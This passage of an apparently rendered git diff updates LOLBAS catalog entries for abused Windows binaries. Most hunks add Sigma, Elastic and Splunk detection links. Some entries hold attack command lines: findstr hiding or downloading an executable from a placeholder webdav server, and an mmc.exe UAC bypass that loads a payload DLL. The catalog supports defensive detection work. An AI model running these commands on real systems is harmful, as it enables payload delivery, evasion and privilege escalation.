- IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -31,7 +31,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||||
|
@ -24,7 +24,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml
|
||||||
|
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
|
- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
|
||||||
- Link: https://twitter.com/bohops/status/1276356245541335048
|
- Link: https://twitter.com/bohops/status/1276356245541335048
|
||||||
|
@ -38,7 +38,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -4,15 +4,15 @@ Description:
|
|||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1564.004
|
MitreID: T1564.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -25,8 +25,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1552.001
|
MitreID: T1552.001
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
|
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
|
||||||
Usecase: Download/Copy file from webdav server
|
Usecase: Download/Copy file from webdav server
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -38,7 +38,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: findstr.exe should normally not be invoked on a client system
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -15,6 +15,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\finger.exe
|
- Path: c:\windows\system32\finger.exe
|
||||||
- Path: c:\windows\syswow64\finger.exe
|
- Path: c:\windows\syswow64\finger.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
|
||||||
- IOC: finger.exe should not be run on a normal workstation.
|
- IOC: finger.exe should not be run on a normal workstation.
|
||||||
- IOC: finger.exe connecting to external resources.
|
- IOC: finger.exe connecting to external resources.
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -16,6 +16,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c27084dd0c432335fa4369e5002a61dfe0ab9c65/rules/windows/process_creation/win_sysmon_driver_unload.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml
|
||||||
- IOC: 4688 events with fltMC.exe
|
- IOC: 4688 events with fltMC.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
|
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
|
||||||
- IOC: cmd /c as child process of ftp.exe
|
- IOC: cmd /c as child process of ftp.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
||||||
|
@ -169,6 +169,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml
|
||||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.sothis.tech/author/jgalvez/
|
- Link: https://www.sothis.tech/author/jgalvez/
|
||||||
|
@ -24,7 +24,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_hh_chm.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_html_help_spawn.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -13,6 +13,7 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||||
|
Detection:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -19,7 +19,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
- IOC: ie4uinit.exe copied outside of %windir%
|
||||||
|
- IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -24,7 +24,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- IOC: Network connections originating from ieexec.exe may be suspicious
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -5,14 +5,14 @@ Author: Hai vaknin (lux)
|
|||||||
Created: 2020-03-17
|
Created: 2020-03-17
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ilasm.exe C:\public\test.txt /exe
|
- Command: ilasm.exe C:\public\test.txt /exe
|
||||||
Description: Binary file used by .NET to compile c# code to .exe
|
Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe
|
||||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
- Command: ilasm.exe C:\public\test.txt /dll
|
- Command: ilasm.exe C:\public\test.txt /dll
|
||||||
Description: Binary file used by .NET to compile c# code to dll
|
Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -22,6 +22,8 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: Ilasm may not be used often in production environments (such as on endpoints)
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,10 +17,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
|
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||||
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
||||||
|
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
|
@ -26,7 +26,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||||
|
@ -31,7 +31,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Makecab getting files from Internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
|
- IOC: Makecab retrieving files from Internet
|
||||||
- IOC: Makecab storing data into alternate data streams
|
- IOC: Makecab storing data into alternate data streams
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -24,6 +24,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mavinject_proc_inj.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml
|
||||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/gN3mes1s/status/941315826107510784
|
- Link: https://twitter.com/gN3mes1s/status/941315826107510784
|
||||||
|
@ -30,6 +30,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/win_workflow_compiler.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||||
- IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
|
- IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
|
||||||
- IOC: Presence of "<CompilerInput" in a text file.
|
- IOC: Presence of "<CompilerInput" in a text file.
|
||||||
|
@ -11,16 +11,27 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.014
|
MitreID: T1218.014
|
||||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||||
|
- Command: mmc.exe gpedit.msc
|
||||||
|
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
|
||||||
|
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
|
||||||
|
Category: UAC Bypass
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1218.014
|
||||||
|
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mmc.exe
|
- Path: C:\Windows\System32\mmc.exe
|
||||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
|
- Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
|
- Person: clem
|
||||||
|
Handle: '@clavoillotte'
|
||||||
---
|
---
|
||||||
|
@ -32,8 +32,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
|
||||||
- IOC: MpCmdRun storing data into alternate data streams.
|
- IOC: MpCmdRun storing data into alternate data streams.
|
||||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
- IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||||
- IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
|
- IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
|
||||||
- IOC: User Agent is "MpCommunication"
|
- IOC: User Agent is "MpCommunication"
|
||||||
|
@ -50,6 +50,17 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5a3af872d86903c13e508348f54e3b519eb01dce/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
|
||||||
|
@ -16,8 +16,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml
|
||||||
- IOC: mscfgtlc.xml changes in system32 folder
|
- IOC: mscfgtlc.xml changes in system32 folder
|
||||||
- IOC: msconfig.exe executing
|
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/991314564896690177
|
- Link: https://twitter.com/pabraeken/status/991314564896690177
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -24,7 +24,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
